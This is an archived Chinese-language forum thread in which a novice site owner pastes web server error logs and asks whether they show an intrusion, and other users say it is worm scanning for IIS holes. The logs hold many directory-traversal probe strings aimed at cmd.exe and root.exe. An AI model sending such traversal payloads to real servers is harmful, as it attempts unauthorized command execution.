PDA

查看完整版本 : 有人可以指點一下這些紀錄檔是不是駭客


furan
2004-10-12, 05:43 PM
最近玩架站
看不懂這些代表何意
有人可以看一下指點一下嗎?
不知道是不是被駭克入侵了!!!
Tue Oct 12 15:08:18 2004 Warning: Request too long for Thread 0 (ID = 1320)
Tue Oct 12 15:08:18 2004 Error Response 400 Thread 0(ID= 1320) to 218.246.108.140 for ""
Tue Oct 12 15:58:09 2004 Error Response 404 Thread 0(ID= 1252) to 218.166.131.120 for "/scripts/root.exe"
Tue Oct 12 15:58:17 2004 Error Response 404 Thread 0(ID= 1252) to 218.166.131.120 for "/MSADC/root.exe"
Tue Oct 12 15:58:25 2004 Error Response 404 Thread 0(ID= 1016) to 218.166.131.120 for "/c/winnt/system32/cmd.exe"
Tue Oct 12 15:58:33 2004 Error Response 404 Thread 0(ID= 1212) to 218.166.131.120 for "/d/winnt/system32/cmd.exe"
Tue Oct 12 15:58:42 2004 Error Response 404 Thread 0(ID= 512) to 218.166.131.120 for "/scripts/..%255c../winnt/system32/cmd.exe"
Tue Oct 12 15:58:50 2004 Error Response 404 Thread 0(ID= 512) to 218.166.131.120 for "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe"
Tue Oct 12 15:58:58 2004 Error Response 404 Thread 0(ID= 1640) to 218.166.131.120 for "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe"
Tue Oct 12 15:59:05 2004 Error Response 404 Thread 0(ID= 1252) to 218.166.131.120 for "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe"
Tue Oct 12 15:59:14 2004 Error Response 404 Thread 0(ID= 1732) to 218.166.131.120 for "/scripts/..%c1%1c../winnt/system32/cmd.exe"
Tue Oct 12 15:59:22 2004 Error Response 404 Thread 0(ID= 1732) to 218.166.131.120 for "/scripts/..%c0%2f../winnt/system32/cmd.exe"
Tue Oct 12 15:59:30 2004 Error Response 404 Thread 0(ID= 1524) to 218.166.131.120 for "/scripts/..%c0%af../winnt/system32/cmd.exe"
Tue Oct 12 15:59:37 2004 Error Response 404 Thread 0(ID= 1524) to 218.166.131.120 for "/scripts/..%c1%9c../winnt/system32/cmd.exe"
Tue Oct 12 15:59:45 2004 Error Response 404 Thread 0(ID= 1640) to 218.166.131.120 for "/scripts/..%%35%63../winnt/system32/cmd.exe"
Tue Oct 12 15:59:53 2004 Error Response 404 Thread 0(ID= 1252) to 218.166.131.120 for "/scripts/..%%35c../winnt/system32/cmd.exe"
Tue Oct 12 16:00:01 2004 Error Response 404 Thread 0(ID= 1252) to 218.166.131.120 for "/scripts/..%25%35%63../winnt/system32/cmd.exe"
Tue Oct 12 16:00:09 2004 Error Response 404 Thread 0(ID= 1640) to 218.166.131.120 for "/scripts/..%252f../winnt/system32/cmd.exe"
Tue Oct 12 17:34:19 2004 Warning: Request too long for Thread 0 (ID = 1544)

sunhouse
2004-10-12, 07:03 PM
看起來滿像的! 找 IIS 的漏洞

adam
2004-10-12, 07:37 PM
~rusure 基本上, 那是對方電腦中毒, 程式碼向外掃描.....

Ricado
2004-10-12, 10:14 PM
單就這一段,無法正確判斷。你的網站是不是有登入畫面或是讓使用者輸入查詢字串的。

vincentliao
2004-10-12, 10:29 PM
高手進來了! ~youarebe:
Dont worry!
It just somebody computer got virus, only , not hacker